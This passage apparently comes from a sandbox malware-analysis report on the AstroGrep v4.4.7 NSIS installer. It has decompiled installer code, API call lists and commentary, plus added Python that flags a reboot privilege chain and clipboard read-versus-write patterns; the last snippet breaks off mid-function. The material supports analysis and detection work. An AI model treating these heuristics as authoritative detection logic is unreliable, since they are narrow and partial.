										// so that child processes inherit it. If this also fails the stub gives up
										// with the "Error writing temporary file" message set at the top.
										GetTempPathA(0x3fc, _t155);
										lstrcatA(_t155, "Low");
										SetEnvironmentVariableA("TEMP", _t155);
										SetEnvironmentVariableA("TMP", _t155);
										_t116 = E004030DE(_t169);
										_t170 = _t116;
										if(_t116 == 0) {
											goto L40;
										}
										goto L30;
									}
									goto L22;
								}
								// "NCRC" matched: the switch only counts if it is followed by a space
								// (or, in the part of the listing cut off below, the end of the line)
								_t139 = _t54[4];
								__eflags = _t139 - 0x20;
								if(_t139 == 0x20) {
									L20:
									// flag bit 4 = skip the CRC check of the installer data
									_t15 = _t162 + 0x20;
									 *_t15 =  *(_t162 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L21;
								}
								__eflags = _t139;
                                                                                                            								if(_t139 != 0) {
                                                                                                            									goto L21;
                                                                                                            								}
                                                                                                            								goto L20;
                                                                                                            							}
                                                                                                            							_t140 = _t54[1];
                                                                                                            							__eflags = _t140 - 0x20;
                                                                                                            							if(_t140 == 0x20) {
                                                                                                            								L16:
                                                                                                            								 *0x42e4a0 = 1;
                                                                                                            								goto L17;
                                                                                                            							}
                                                                                                            							__eflags = _t140;
                                                                                                            							if(_t140 != 0) {
                                                                                                            								goto L17;
                                                                                                            							}
                                                                                                            							goto L16;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						goto L9;
                                                                                                            					}
                                                                                                            					do {
                                                                                                            						L9:
                                                                                                            						_t54 =  &(_t54[1]);
                                                                                                            						__eflags =  *_t54 - 0x20;
                                                                                                            					} while ( *_t54 == 0x20);
                                                                                                            					goto L10;
                                                                                                            				}
                                                                                                            				goto L27;
                                                                                                            			}
[Instruction address column of this decompiled listing (addresses 0x0040311f through 0x004035cf, with 0x00000000 for unresolved entries); the column was detached from its code lines during extraction and cannot be re-aligned here.]
                                                                                                            0x00403283
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403283
                                                                                                            0x00403234
                                                                                                            0x00403237
                                                                                                            0x0040323a
                                                                                                            0x00403240
                                                                                                            0x00403240
                                                                                                            0x00000000
                                                                                                            0x00403240
                                                                                                            0x0040323c
                                                                                                            0x0040323e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040323e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040320f
                                                                                                            0x0040320f
                                                                                                            0x0040320f
                                                                                                            0x00403210
                                                                                                            0x00403210
                                                                                                            0x00000000
                                                                                                            0x0040320f
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNELBASE ref: 00403134
                                                                                                            • GetVersion.KERNEL32 ref: 0040313A
                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403163
                                                                                                            • #17.COMCTL32(00000007,00000009), ref: 00403185
                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040318C
                                                                                                            • SHGetFileInfoA.SHELL32(00428828,00000000,?,00000160,00000000), ref: 004031A8
                                                                                                            • GetCommandLineA.KERNEL32(AstroGrep v4.4.7 Setup,NSIS Error), ref: 004031BD
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" ,00000000), ref: 004031D0
                                                                                                            • CharNextA.USER32(00000000,"C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" ,00000020), ref: 004031FB
                                                                                                            • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032F8
                                                                                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403309
                                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403315
                                                                                                            • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403329
                                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403331
                                                                                                            • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403342
                                                                                                            • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040334A
                                                                                                            • DeleteFileA.KERNELBASE(1033), ref: 0040335E
                                                                                                              • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                              • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                            • ExitProcess.KERNEL32(?), ref: 00403407
                                                                                                            • OleUninitialize.OLE32(?), ref: 0040340C
                                                                                                            • ExitProcess.KERNEL32 ref: 0040342D
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040354A
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403551
                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403569
                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403588
                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004035AC
                                                                                                            • ExitProcess.KERNEL32 ref: 004035CF
                                                                                                              • Part of subcall function 00405525: MessageBoxIndirectA.USER32(00409218), ref: 00405580
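The list above records the NSIS installer's reboot path: GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA(SeShutdownPrivilege), AdjustTokenPrivileges and then ExitWindowsEx(00000002,80040002), i.e. EWX_REBOOT with a planned application/installation reason code. This is the call sequence a "shutdown / reboot the system" signature keys on, and it is ordinary NSIS behaviour for an installer that may need a restart rather than anything specific to the dropped payload. The Python below is an added example for reading such reports, not part of the Joe Sandbox output or the sample: it parses these bullet lines into records (handling the ordinal form `#17.COMCTL32`, the nested "Part of subcall function" form, quoted paths containing commas and calls without an argument list) and flags the in-order privilege-to-ExitWindowsEx chain, decoding the ExitWindowsEx arguments. `REPORT_LINES` is copied from the list above; the function names and the chain heuristic are my own.

```python
"""Parse the bullet lines of a Joe Sandbox "APIs" list and flag the
token-privilege -> ExitWindowsEx reboot sequence.  Added example for reading
this report: REPORT_LINES is copied from the list above; the function names
and the chain heuristic are my own, not the sandbox's."""
import re
from typing import Dict, List, Optional

# Subset of the report's bullet lines, copied verbatim ("ref" is the call site).
REPORT_LINES = r"""
• SetErrorMode.KERNELBASE ref: 00403134
• GetVersion.KERNEL32 ref: 0040313A
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403163
• #17.COMCTL32(00000007,00000009), ref: 00403185
• GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" ,00000000), ref: 004031D0
• SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040334A
  • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
• GetCurrentProcess.KERNEL32(00000028,?), ref: 0040354A
• OpenProcessToken.ADVAPI32(00000000), ref: 00403551
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403569
• AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403588
• ExitWindowsEx.USER32(00000002,80040002), ref: 004035AC
• ExitProcess.KERNEL32 ref: 004035CF
"""

LINE_RE = re.compile(
    r"""^\s*•\s*
        (?:Part\ of\ subcall\ function\ (?P<parent>[0-9A-Fa-f]+):\s*)?  # nested call, if any
        (?P<api>[\#\w]+)\.(?P<module>\w+)         # ExitWindowsEx.USER32, or ordinal #17.COMCTL32
        (?:\((?P<args>.*)\))?                     # argument list is optional
        ,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$     # call-site address
    """,
    re.VERBOSE,
)


def split_args(raw: Optional[str]) -> List[str]:
    """Split on commas that are outside double quotes (paths in the report are quoted)."""
    if not raw:
        return []
    out, cur, quoted = [], [], False
    for ch in raw:
        if ch == '"':
            quoted = not quoted
        if ch == "," and not quoted:
            out.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    out.append("".join(cur).strip())
    return out


def parse_api_lines(text: str) -> List[Dict]:
    """One record per bullet line; raises on a line the pattern does not cover."""
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API line: {line!r}")
        calls.append({"api": m["api"], "module": m["module"], "parent": m["parent"],
                      "args": split_args(m["args"]), "ref": int(m["ref"], 16)})
    return calls


def as_hex(value: str) -> Optional[int]:
    """Arguments are bare hex words; '?' or a string literal yields None."""
    try:
        return int(value, 16)
    except ValueError:
        return None


EWX_FLAGS = {0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT", 0x4: "EWX_FORCE",
             0x8: "EWX_POWEROFF", 0x10: "EWX_FORCEIFHUNG"}
SHTDN_MAJOR = {0x00030000: "SHTDN_REASON_MAJOR_SOFTWARE", 0x00040000: "SHTDN_REASON_MAJOR_APPLICATION"}
SHTDN_MINOR = {0x1: "SHTDN_REASON_MINOR_MAINTENANCE", 0x2: "SHTDN_REASON_MINOR_INSTALLATION",
               0x3: "SHTDN_REASON_MINOR_UPGRADE"}


def decode_ewx(uflags: Optional[int]) -> List[str]:
    if uflags is None:
        return ["?"]
    return [name for bit, name in EWX_FLAGS.items() if uflags & bit] or ["EWX_LOGOFF"]


def decode_shutdown_reason(reason: Optional[int]) -> Dict:
    """dwReason layout: flags in the top byte, major reason in bits 16-23, minor in the low word."""
    if reason is None:
        return {"major": "?", "minor": "?", "flags": []}
    flags = [n for bit, n in ((0x80000000, "SHTDN_REASON_FLAG_PLANNED"),
                              (0x40000000, "SHTDN_REASON_FLAG_USER_DEFINED")) if reason & bit]
    return {"major": SHTDN_MAJOR.get(reason & 0x00FF0000, hex(reason & 0x00FF0000)),
            "minor": SHTDN_MINOR.get(reason & 0x0000FFFF, hex(reason & 0x0000FFFF)),
            "flags": flags}


REBOOT_CHAIN = ("OpenProcessToken", "LookupPrivilegeValue", "AdjustTokenPrivileges", "ExitWindowsEx")


def find_reboot_chain(calls: List[Dict]) -> Optional[Dict]:
    """Report the first in-order OpenProcessToken -> LookupPrivilegeValue* -> AdjustTokenPrivileges
    -> ExitWindowsEx sequence, with the privilege name and the decoded ExitWindowsEx arguments."""
    stage, privilege = 0, None
    for c in calls:
        want = REBOOT_CHAIN[stage]
        if not c["api"].startswith(want):
            continue
        if want == "LookupPrivilegeValue" and len(c["args"]) > 1:
            privilege = c["args"][1]
        if want == "ExitWindowsEx":
            args = c["args"] + ["?", "?"]   # pad so a truncated argument list still decodes
            return {"ref": c["ref"], "privilege": privilege,
                    "flags": decode_ewx(as_hex(args[0])),
                    "reason": decode_shutdown_reason(as_hex(args[1]))}
        stage += 1
    return None


if __name__ == "__main__":
    parsed = parse_api_lines(REPORT_LINES)
    print(f"{len(parsed)} calls parsed; reboot chain: {find_reboot_chain(parsed)}")
```

The chain matcher is deliberately order-sensitive: a report that contains ExitWindowsEx without the preceding privilege adjustment (or the adjustment without the call) is not flagged, which keeps plain "can the process reboot" heuristics from firing on every program that merely imports advapi32. Argument values in these lists are stack snapshots, so anything that is not a hex word (a `?`, a string such as `SeShutdownPrivilege`) is passed through as text rather than decoded.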
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                             • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                             • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                             • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                             • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                             • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                                                            • String ID: "$"C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" $.tmp$1033$AstroGrep v4.4.7 Setup$C:\Program Files (x86)\AstroGrep$C:\Program Files (x86)\AstroGrep$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                            • API String ID: 3329125770-3767821768
                                                                                                            • Opcode ID: 8cf9f27780d4a9ffc016deafba261a7cdcbd07a9ed72e1522d1863b0730728e5
                                                                                                            • Instruction ID: 749ed98c63e487a66f460374afa67f5348490bcf6ac540fe4d7c6930d14d49f5
                                                                                                            • Opcode Fuzzy Hash: 8cf9f27780d4a9ffc016deafba261a7cdcbd07a9ed72e1522d1863b0730728e5
                                                                                                            • Instruction Fuzzy Hash: E1C105306086416AE7216F61AC4DA6F3EACEF46706F04457FF541BA1E3C77C9A058B2E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 96%
                                                                                                            			E00405086(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                                            				struct HWND__* _v8;
                                                                                                            				struct tagRECT _v24;
                                                                                                            				void* _v32;
                                                                                                            				signed int _v36;
                                                                                                            				int _v40;
                                                                                                            				int _v44;
                                                                                                            				signed int _v48;
                                                                                                            				int _v52;
                                                                                                            				void* _v56;
                                                                                                            				void* _v64;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				struct HWND__* _t87;
                                                                                                            				struct HWND__* _t89;
                                                                                                            				long _t90;
                                                                                                            				int _t95;
                                                                                                            				int _t96;
                                                                                                            				long _t99;
                                                                                                            				void* _t102;
                                                                                                            				intOrPtr _t113;
                                                                                                            				void* _t121;
                                                                                                            				intOrPtr _t124;
                                                                                                            				struct HWND__* _t128;
                                                                                                            				int _t150;
                                                                                                            				int _t153;
                                                                                                            				long _t157;
                                                                                                            				struct HWND__* _t161;
                                                                                                            				struct HMENU__* _t163;
                                                                                                            				long _t165;
                                                                                                            				void* _t166;
                                                                                                            				char* _t167;
                                                                                                            				char* _t168;
                                                                                                            				int _t169;
                                                                                                            
                                                                                                             				_t87 =  *0x42dbe4; // 0x40266 (global: HWND of the NSIS details list view, compared against wParam on WM_CONTEXTMENU below)
                                                                                                            				_t157 = _a8;
                                                                                                            				_t150 = 0;
                                                                                                            				_v8 = _t87;
                                                                                                             				if(_t157 != 0x110) { // 0x110 = WM_INITDIALOG; every other message is dispatched first
                                                                                                            					__eflags = _t157 - 0x405;
                                                                                                             					if(_t157 == 0x405) { // 0x405 = WM_USER+5 (NSIS WM_NOTIFY_START): spawn the install thread
                                                                                                             						_t121 = CreateThread(0, 0, E0040501A, GetDlgItem(_a4, 0x3ec), 0,  &_a8); // executed; 0x3ec = dialog control ID 1004
                                                                                                             						FindCloseChangeNotification(_t121); // import resolved to FindCloseChangeNotification, which in kernel32 shares CloseHandle's entry point: this is CloseHandle(hThread)
                                                                                                            					}
                                                                                                            					__eflags = _t157 - 0x111;
                                                                                                             					if(_t157 != 0x111) { // 0x111 = WM_COMMAND
                                                                                                            						L17:
                                                                                                            						__eflags = _t157 - 0x404;
                                                                                                             						if(_t157 != 0x404) { // 0x404 = WM_USER+4 (NSIS WM_NOTIFY_INSTPROC_DONE): install thread finished
                                                                                                            							L25:
                                                                                                            							__eflags = _t157 - 0x7b;
                                                                                                             							if(_t157 != 0x7b) { // 0x7b = WM_CONTEXTMENU; only handled when it comes from the details list
                                                                                                            								goto L20;
                                                                                                            							}
                                                                                                            							_t89 = _v8;
                                                                                                            							__eflags = _a12 - _t89;
                                                                                                            							if(_a12 != _t89) {
                                                                                                            								goto L20;
                                                                                                            							}
                                                                                                             							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150); // 0x1004 = LVM_GETITEMCOUNT; nothing to copy if the list is empty
                                                                                                            							__eflags = _t90 - _t150;
                                                                                                            							_a12 = _t90;
                                                                                                            							if(_t90 <= _t150) {
                                                                                                            								L36:
                                                                                                            								return 0;
                                                                                                            							}
                                                                                                             							_t163 = CreatePopupMenu();
                                                                                                             							AppendMenuA(_t163, _t150, 1, E00405D51(_t150, _t157, _t163, _t150, 0xffffffe1)); // one item, ID 1, labelled from the NSIS language-string table (the "Copy Details To Clipboard" entry)
                                                                                                            							_t95 = _a16;
                                                                                                            							__eflags = _a16 - 0xffffffff;
                                                                                                            							_t153 = _a16 >> 0x10;
                                                                                                            							if(_a16 == 0xffffffff) {
                                                                                                            								GetWindowRect(_v8,  &_v24);
                                                                                                            								_t95 = _v24.left;
                                                                                                            								_t153 = _v24.top;
                                                                                                            							}
                                                                                                             							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150); // 0x180 = TPM_NONOTIFY | TPM_RETURNCMD: returns the selected item ID
                                                                                                            							__eflags = _t96 - 1;
                                                                                                            							if(_t96 == 1) {
                                                                                                            								_t165 = 1;
                                                                                                            								__eflags = 1;
                                                                                                             								_v56 = _t150; // LVITEM at &_v64: iSubItem = 0
                                                                                                             								_v44 = 0x429868; // LVITEM.pszText = static scratch buffer
                                                                                                             								_v40 = 0xfff; // LVITEM.cchTextMax
                                                                                                            								_a4 = _a12;
                                                                                                             								do { // first pass: sum the text length of every row (walking down from count-1) to size the clipboard buffer
                                                                                                             									_a4 = _a4 - 1;
                                                                                                             									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64); // 0x102d = LVM_GETITEMTEXTA, returns the row's text length
                                                                                                             									__eflags = _a4 - _t150;
                                                                                                             									_t165 = _t165 + _t99 + 2; // +2 reserves room for "\r\n" after each row
                                                                                                             								} while (_a4 != _t150);
                                                                                                            								OpenClipboard(_t150);
                                                                                                            								EmptyClipboard();
                                                                                                             								_t102 = GlobalAlloc(0x42, _t165); // 0x42 = GMEM_MOVEABLE | GMEM_ZEROINIT, as SetClipboardData requires
                                                                                                            								_a4 = _t102;
                                                                                                            								_t166 = GlobalLock(_t102);
                                                                                                             								do { // second pass: copy each row into the buffer followed by CR LF
                                                                                                             									_v44 = _t166; // pszText points at the current write position
                                                                                                             									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64); // LVM_GETITEMTEXTA writes the row text in place
                                                                                                             									 *_t167 = 0xd;
                                                                                                             									_t168 = _t167 + 1;
                                                                                                             									 *_t168 = 0xa;
                                                                                                             									_t166 = _t168 + 1;
                                                                                                             									_t150 = _t150 + 1;
                                                                                                             									__eflags = _t150 - _a12;
                                                                                                             								} while (_t150 < _a12);
                                                                                                             								GlobalUnlock(_a4);
                                                                                                             								SetClipboardData(1, _a4); // 1 = CF_TEXT; this routine writes the details list to the clipboard, it does not read clipboard contents
                                                                                                             								CloseClipboard();
                                                                                                            							}
                                                                                                            							goto L36;
                                                                                                            						}
                                                                                                            						__eflags =  *0x42dbcc - _t150; // 0x0
                                                                                                            						if(__eflags == 0) {
                                                                                                             							ShowWindow( *0x42e408, 8); // executed; 8 = SW_SHOWNA
                                                                                                            							__eflags =  *0x42e48c - _t150;
                                                                                                            							if( *0x42e48c == _t150) {
                                                                                                            								_t113 =  *0x429040; // 0x6eafd4
                                                                                                            								E00404F48( *((intOrPtr*)(_t113 + 0x34)), _t150); // executed
                                                                                                            							}
                                                                                                            							E00403EED(1);
                                                                                                            							goto L25;
                                                                                                            						}
                                                                                                            						 *0x428c38 = 2;
                                                                                                            						E00403EED(0x78);
                                                                                                            						goto L20;
                                                                                                            					} else {
                                                                                                            						__eflags = _a12 - 0x403;
                                                                                                            						if(_a12 != 0x403) {
                                                                                                            							L20:
                                                                                                            							return E00403F7B(_t157, _a12, _a16);
                                                                                                            						}
                                                                                                            						ShowWindow( *0x42dbd0, _t150);
                                                                                                            						ShowWindow(_v8, 8);
                                                                                                            						E00403F49(_v8);
                                                                                                            						goto L17;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_v48 = _v48 | 0xffffffff;
                                                                                                            				_v36 = _v36 | 0xffffffff;
                                                                                                            				_t169 = 2;
                                                                                                            				_v56 = _t169;
                                                                                                            				_v52 = 0;
                                                                                                            				_v44 = 0;
                                                                                                            				_v40 = 0;
                                                                                                            				asm("stosd");
                                                                                                            				asm("stosd");
                                                                                                            				_t124 =  *0x42e410;
                                                                                                            				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
                                                                                                            				_a8 =  *((intOrPtr*)(_t124 + 0x60));
                                                                                                            				 *0x42dbd0 = GetDlgItem(_a4, 0x403);
                                                                                                            				 *0x42dbc8 = GetDlgItem(_a4, 0x3ee);
                                                                                                            				_t128 = GetDlgItem(_a4, 0x3f8);
                                                                                                            				 *0x42dbe4 = _t128;
                                                                                                            				_v8 = _t128;
                                                                                                            				E00403F49( *0x42dbd0);
                                                                                                            				 *0x42dbd4 = E004047E6(4);
                                                                                                            				 *0x42dbec = 0;
                                                                                                            				GetClientRect(_v8,  &_v24);
                                                                                                            				_v48 = _v24.right - GetSystemMetrics(_t169);
                                                                                                            				SendMessageA(_v8, 0x101b, 0,  &_v56);
                                                                                                            				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                                                                            				if(_a12 >= 0) {
                                                                                                            					SendMessageA(_v8, 0x1001, 0, _a12);
                                                                                                            					SendMessageA(_v8, 0x1026, 0, _a12);
                                                                                                            				}
                                                                                                            				if(_a8 >= _t150) {
                                                                                                            					SendMessageA(_v8, 0x1024, _t150, _a8);
                                                                                                            				}
                                                                                                            				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                            				_push(0x1b);
                                                                                                            				E00403F14(_a4);
                                                                                                            				if(( *0x42e418 & 0x00000003) != 0) {
                                                                                                            					ShowWindow( *0x42dbd0, _t150);
                                                                                                            					if(( *0x42e418 & 0x00000002) != 0) {
                                                                                                            						 *0x42dbd0 = _t150;
                                                                                                            					} else {
                                                                                                            						ShowWindow(_v8, 8);
                                                                                                            					}
                                                                                                            					E00403F49( *0x42dbc8);
                                                                                                            				}
                                                                                                            				_t161 = GetDlgItem(_a4, 0x3ec);
                                                                                                            				SendMessageA(_t161, 0x401, _t150, 0x75300000);
                                                                                                            				if(( *0x42e418 & 0x00000004) != 0) {
                                                                                                            					SendMessageA(_t161, 0x409, _t150, _a8);
                                                                                                            					SendMessageA(_t161, 0x2001, _t150, _a12);
                                                                                                            				}
                                                                                                            				goto L36;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32 ref: 004050E5
                                                                                                            • GetDlgItem.USER32 ref: 004050F4
                                                                                                            • GetClientRect.USER32 ref: 00405131
                                                                                                            • GetSystemMetrics.USER32 ref: 00405138
                                                                                                            • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405159
                                                                                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040516A
                                                                                                            • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040517D
                                                                                                            • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040518B
                                                                                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040519E
                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004051C0
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004051D4
                                                                                                            • GetDlgItem.USER32 ref: 004051F5
                                                                                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405205
                                                                                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040521E
                                                                                                            • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040522A
                                                                                                            • GetDlgItem.USER32 ref: 00405103
                                                                                                              • Part of subcall function 00403F49: SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                                                                            • GetDlgItem.USER32 ref: 00405246
                                                                                                            • CreateThread.KERNELBASE ref: 00405254
                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040525B
• ShowWindow.USER32(00000000), ref: 0040527E
• ShowWindow.USER32(?,00000008), ref: 00405285
• ShowWindow.USER32(00000008), ref: 004052CB
• SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FF
• CreatePopupMenu.USER32 ref: 00405310
• AppendMenuA.USER32 ref: 00405325
• GetWindowRect.USER32 ref: 00405345
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040535E
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040539A
• OpenClipboard.USER32(00000000), ref: 004053AA
• EmptyClipboard.USER32 ref: 004053B0
• GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
• GlobalLock.KERNEL32 ref: 004053C3
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
• GlobalUnlock.KERNEL32(00000000), ref: 004053F0
• SetClipboardData.USER32 ref: 004053FB
• CloseClipboard.USER32 ref: 00405401
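The API references above are the dialog's "copy details" handler: two SendMessageA calls with message 0x102D (LVM_GETITEMTEXTA, reading item text out of the list view) sit between OpenClipboard/EmptyClipboard/GlobalAlloc/GlobalLock and GlobalUnlock/SetClipboardData/CloseClipboard. The listing contains SetClipboardData and no GetClipboardData, so this function writes the clipboard rather than reading it, which matters when deciding whether the report's clipboard signature should be attributed to this routine. The Python below is an added example, not part of the Joe Sandbox report: it parses lines in the report's "Name.MODULE(args), ref: address" format (the sample input is the list above, embedded as a constructed string), names the two list-view messages it knows, and reports the clipboard direction the call order supports. The message table, `decode_message` and `clipboard_directions` are assumptions of this example, not report fields.

```python
import re
from typing import List, NamedTuple, Optional, Set

# Constructed sample input: the API reference lines of the dialog procedure
# as the report lists them (plain text, nothing is executed).
SAMPLE_API_REFS = """\
• ShowWindow.USER32(00000000), ref: 0040527E
• ShowWindow.USER32(?,00000008), ref: 00405285
• ShowWindow.USER32(00000008), ref: 004052CB
• SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FF
• CreatePopupMenu.USER32 ref: 00405310
• AppendMenuA.USER32 ref: 00405325
• GetWindowRect.USER32 ref: 00405345
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040535E
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040539A
• OpenClipboard.USER32(00000000), ref: 004053AA
• EmptyClipboard.USER32 ref: 004053B0
• GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
• GlobalLock.KERNEL32 ref: 004053C3
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
• GlobalUnlock.KERNEL32(00000000), ref: 004053F0
• SetClipboardData.USER32 ref: 004053FB
• CloseClipboard.USER32 ref: 00405401
"""

class ApiRef(NamedTuple):
    api: str
    module: str
    args: List[Optional[int]]  # None stands for an unresolved '?' argument
    addr: int

# "Name.MODULE(arg,arg), ref: ADDR" or "Name.MODULE ref: ADDR"
_LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<addr>[0-9A-Fa-f]{8})\s*$"
)

def parse_api_refs(text: str) -> List[ApiRef]:
    """Parse one API reference per non-empty line; raise on an unknown shape."""
    refs: List[ApiRef] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = _LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API reference line: {line!r}")
        args: List[Optional[int]] = []
        if m.group("args"):
            for a in m.group("args").split(","):
                a = a.strip()
                args.append(None if a == "?" else int(a, 16))
        refs.append(ApiRef(m.group("api"), m.group("mod").upper(),
                           args, int(m.group("addr"), 16)))
    return refs

# List-view messages (LVM_FIRST = 0x1000) that occur in this listing.
LVM_FIRST = 0x1000
LIST_VIEW_MESSAGES = {
    LVM_FIRST + 4: "LVM_GETITEMCOUNT",   # 0x1004
    LVM_FIRST + 45: "LVM_GETITEMTEXTA",  # 0x102D
}

def decode_message(ref: ApiRef) -> Optional[str]:
    """Name the window message of a SendMessageA call (hex if unknown)."""
    if ref.api != "SendMessageA" or len(ref.args) < 2 or ref.args[1] is None:
        return None
    return LIST_VIEW_MESSAGES.get(ref.args[1], f"0x{ref.args[1]:04X}")

# Ordered sub-sequences that make up a clipboard write and a clipboard read.
CLIPBOARD_WRITE = ("OpenClipboard", "EmptyClipboard", "SetClipboardData", "CloseClipboard")
CLIPBOARD_READ = ("OpenClipboard", "GetClipboardData", "CloseClipboard")

def _contains_in_order(names: List[str], seq) -> bool:
    pos = 0
    for n in names:
        if n == seq[pos]:
            pos += 1
            if pos == len(seq):
                return True
    return False

def clipboard_directions(refs: List[ApiRef]) -> Set[str]:
    """Return the subset of {'write', 'read'} that the call order supports."""
    names = [r.api for r in refs]
    found = set()
    if _contains_in_order(names, CLIPBOARD_WRITE):
        found.add("write")
    if _contains_in_order(names, CLIPBOARD_READ):
        found.add("read")
    return found

def summarize(text: str) -> List[str]:
    """One line per call: address, module!api and the decoded message if any."""
    out = []
    for r in parse_api_refs(text):
        msg = decode_message(r)
        out.append(f"{r.addr:08X} {r.module}!{r.api}" + (f"({msg})" if msg else ""))
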